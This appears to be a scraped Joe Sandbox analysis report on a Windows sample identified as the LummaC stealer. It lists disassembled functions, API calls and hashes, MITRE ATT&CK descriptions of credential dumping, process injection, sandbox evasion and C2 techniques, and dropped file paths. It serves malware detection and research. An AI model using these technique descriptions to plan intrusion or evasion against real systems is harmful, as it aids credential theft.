Instruction ID: e9c5bc8052c5cb84dadaaaaf44502ca3d896b486ec1672cb0cc84ce7e75d080f
Opcode Fuzzy Hash: 8dd5fb1bb415952618eeb69f9c4c5347ce22eee3cd407679ffb4ef07d832097c
Instruction Fuzzy Hash: A29128F2F3060A8ADF24DB98C88117DB674EB54702F64461AE845EB390E7B4EB40CB57

Function 042334A2 Relevance: 6.2, APIs: 4, Instructions: 175COMMON

Download Yara Rule

APIs

CreateDCW.GDI32(00462C52,00000000,00000000,00000000), ref: 042334EF
GetSystemMetrics.USER32(00000001), ref: 0423362A
GetSystemMetrics.USER32(00000000), ref: 04233685

Memory Dump Source

Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID: MetricsSystem$Create
String ID:
API String ID: 1087689917-0
Opcode ID: 39e2f0d19a532311fcde3bb1b361131464c434098777e83cc3901b20fe1d0761
Instruction ID: 23b6910e4b861957c3c9e2b4dcfbecdbdfb7bd6444268f6b27be7134c830c90c
Opcode Fuzzy Hash: 39e2f0d19a532311fcde3bb1b361131464c434098777e83cc3901b20fe1d0761
Instruction Fuzzy Hash: 485127F5F301069FDF21CB9C88455FD79B6AB49212F200523ED55EA320D2B4EB858B56

Function 0425992D Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 042599F4
___AdjustPointer.LIBCMT ref: 04259A17
___AdjustPointer.LIBCMT ref: 04259AB3

Memory Dump Source

Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: e549594ee335f88c809106c5544a2f4baf43b5eb7b90bfa02ae88c691973c827
Instruction ID: 87da42afbff1e0bd505ec52c3a9647bcae2aabf628580660ab39f66a3b4c41db
Opcode Fuzzy Hash: e549594ee335f88c809106c5544a2f4baf43b5eb7b90bfa02ae88c691973c827
Instruction Fuzzy Hash: 8551BFF2B25602EFEB298F14D840BAA77A8FF44311F144129EC05972A0E731F9C1CBA4

Function 0424D17C Relevance: 6.1, APIs: 4, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,0424D289,000000FF,0046B0C0,04236A8C,00000000,04205C9A,?,0424D03D,00000021,00465044,0046503C,00465044,04236A8C), ref: 0424D23D

Memory Dump Source

Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 6740c229368fb351fb4ec7fc524e13049988398a7c5dabcb7bff3fed9ad9b5d0
Instruction ID: 7e256500541e2da20d3db0b1a33ecb2cfa09e0ad959316e3d5f19ddb0f69e89c
Opcode Fuzzy Hash: 6740c229368fb351fb4ec7fc524e13049988398a7c5dabcb7bff3fed9ad9b5d0
Instruction Fuzzy Hash: D221D831F71211A7EB26DFA0EC80B5A3768DBC1764B140220ED15A7691FBB0FD00C6E5

Function 042511A8 Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(?,00000000,00000000,04248448,00000001,?,04248448,042037CF,?,00000000), ref: 042511BE
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,042037CF,00000000), ref: 042511CB
SetFilePointerEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,042037CF,00000000), ref: 042511F1
SetFilePointerEx.KERNEL32(?,00000000,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 04251217

Memory Dump Source

Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID: FilePointer$ErrorLast
String ID:
API String ID: 142388799-0
Opcode ID: cfe5fe78128bb7dd68b840a0eb5d6fe201827b23293f70a06ce6f48395b8db59
Instruction ID: 89d2d33358c66a2f7aeb5e6c53a277b47975dfd1e2444048716a6543108b24db
Opcode Fuzzy Hash: cfe5fe78128bb7dd68b840a0eb5d6fe201827b23293f70a06ce6f48395b8db59
Instruction Fuzzy Hash: 60115E75A1012ABBDF109F55EC48AAE3F7DEF04364F008554FC24D61A0D771EA50DBA0

Function 0425600D Relevance: 6.0, APIs: 4, Instructions: 42COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,?,?,00000000,04255F06,00000000,?,0425B683,04255F06,04246E9E,?,00000000,00000104,?,00000001,00000000), ref: 04256023
GetLastError.KERNEL32(?,0425B683,04255F06,04246E9E,?,00000000,00000104,?,00000001,00000000,00000000,?,04255F06,?,00000104,04246E9E), ref: 0425602D
__dosmaperr.LIBCMT ref: 04256034
GetFullPathNameW.KERNEL32(?,?,?,00000000,?,?,0425B683,04255F06,04246E9E,?,00000000,00000104,?,00000001,00000000,00000000), ref: 0425605E

Memory Dump Source

Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID: FullNamePath$ErrorLast__dosmaperr
String ID:
API String ID: 1391015842-0
Opcode ID: c7c4edbd7a7b70f3d07427bfb556099335345e9fdb19da3b7b6c0357393f98ce
Instruction ID: b5339189711b03238beef4cacf71feb987463fc7d01fb881f7264fd36c93f304
Opcode Fuzzy Hash: c7c4edbd7a7b70f3d07427bfb556099335345e9fdb19da3b7b6c0357393f98ce
Instruction Fuzzy Hash: 39F04436310211AFEB305F62DC08E577BADFF443607108429E95AC6570EBB1F811DB64

Function 04256073 Relevance: 6.0, APIs: 4, Instructions: 42COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,?,?,00000000,04255F06,00000000,?,0425B60B,04255F06,04255F06,04246E9E,?,00000000,00000104,?,00000001), ref: 04256089
GetLastError.KERNEL32(?,0425B60B,04255F06,04255F06,04246E9E,?,00000000,00000104,?,00000001,00000000,00000000,?,04255F06,?,00000104), ref: 04256093
__dosmaperr.LIBCMT ref: 0425609A
GetFullPathNameW.KERNEL32(?,?,?,00000000,?,?,0425B60B,04255F06,04255F06,04246E9E,?,00000000,00000104,?,00000001,00000000), ref: 042560C4

Memory Dump Source

Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID: FullNamePath$ErrorLast__dosmaperr
String ID:
API String ID: 1391015842-0
Opcode ID: a72e1de69e8ac08235e0b59f4006df7dc26bf1db3731920fcb84235d1ad79fd5
Instruction ID: 6638d3532a263319108ea2b2befbd25980d095cae3f7428a32b615aadb17d9e9
Opcode Fuzzy Hash: a72e1de69e8ac08235e0b59f4006df7dc26bf1db3731920fcb84235d1ad79fd5
Instruction Fuzzy Hash: 7EF03136310611AFEB245F62DC04A5BBBAEFF452607108829E959C2530EBB2F811DB64

Function 0425BF6F Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,0425578A,00000000,00000000,00000000,?,0425A1D1,00000000,00000001,00000000,?,?,04250DAE,?,0425578A,00000000), ref: 0425BF86
GetLastError.KERNEL32(?,0425A1D1,00000000,00000001,00000000,?,?,04250DAE,?,0425578A,00000000,?,?,?,042506F9,04243F62), ref: 0425BF92

Part of subcall function 0425BFE3: CloseHandle.KERNEL32(0046BAC0,0425BFA2,?,0425A1D1,00000000,00000001,00000000,?,?,04250DAE,?,0425578A,00000000,?,?), ref: 0425BFF3

___initconout.LIBCMT ref: 0425BFA2

Part of subcall function 0425BFC4: CreateFileW.KERNEL32(00468068,40000000,00000003,00000000,00000003,00000000,00000000,0425BF60,0425A1BE,?,?,04250DAE,?,0425578A,00000000,?), ref: 0425BFD7

WriteConsoleW.KERNEL32(00000000,0425578A,00000000,00000000,?,0425A1D1,00000000,00000001,00000000,?,?,04250DAE,?,0425578A,00000000,?), ref: 0425BFB7

Memory Dump Source

Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: c2a2ecc1c2a42e22a3f830c2b4be3aaf5d7a6f5fb3480db1df2f59ef4a2b949f
Instruction ID: c40c1826a6c558e8c5c3fcff180bcbfccdb2ddcc4f5fb1beb9d1b203cdccfe50
Opcode Fuzzy Hash: c2a2ecc1c2a42e22a3f830c2b4be3aaf5d7a6f5fb3480db1df2f59ef4a2b949f
Instruction Fuzzy Hash: 18F01C36210129BBDF221FD5DC08AD93F2AFF492A1F144020FE19D5130D7B2E8609F95

Function 0423D9D7 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 122COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 0423DA16
__IsNonwritableInCurrentImage.LIBCMT ref: 0423DACA

Strings

csm, xrefs: 0423DAB4

Memory Dump Source

Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID: CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 3480331319-1018135373
Opcode ID: 4e5ede0b4027151e909a7cfdd177c32462acfec368dfe8ef4ee5f082c53f6a08
Instruction ID: 934b8d627fc562f218a34aa265eea464401a82f7db28a6ac60520fddf8ad3e63
Opcode Fuzzy Hash: 4e5ede0b4027151e909a7cfdd177c32462acfec368dfe8ef4ee5f082c53f6a08
Instruction Fuzzy Hash: 3541E174B3420AABCF10DF69C880A9EBFB5EF85319F148195E8149B391E771BA05CB91

Function 04259896 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 04259B0D

Strings

csm, xrefs: 04259B2F
csm, xrefs: 04259BA0

Memory Dump Source

Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd

Yara matches

Similarity

API ID: ___except_validate_context_record
String ID: csm$csm
API String ID: 3493665558-3733052814
Opcode ID: bd77938e174d17ab149a6bce2b14a2ddc10501c9168853feaa912111e58622ef
Instruction ID: 3af92b996dfafc5219f4ecf2262d8eea95e4e38bf140de5512c3dae658f92a3d
Opcode Fuzzy Hash: bd77938e174d17ab149a6bce2b14a2ddc10501c9168853feaa912111e58622ef
Instruction Fuzzy Hash: ED319EB2620219DBEF26CF50C944A6E7B6AFF08315F18455AFC544A130D333E8E1DB81

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Driver: Driver Load, File: File Creation, File: File Modification, Module: Module Load
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report I5jG2Os8GA.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_I5jG2Os8GA.exe_f92922c667fcc49ff5938083b97b3fee491ea0da_44de383f_e5452863-eeb7-4e67-8969-f221caec383b\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER69C3.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6A70.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6AA0.tmp.xml

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Windows Analysis Report
I5jG2Os8GA.exe

Function 00405AAA Relevance: 24.9, APIs: 8, Strings: 6, Instructions: 448
stringCOMMON

Function 0040620B Relevance: 21.4, APIs: 8, Strings: 4, Instructions: 445
stringCOMMON

Function 0042B9C5 Relevance: 16.7, Strings: 13, Instructions: 436
COMMON

Function 0040A928 Relevance: 14.5, APIs: 5, Strings: 3, Instructions: 475
stringCOMMON

Function 0042FD35 Relevance: 14.1, Strings: 11, Instructions: 308
COMMON

Function 004262A1 Relevance: 12.6, APIs: 2, Strings: 5, Instructions: 391
libraryCOMMON

Function 0040B129 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 375
nativefileCOMMON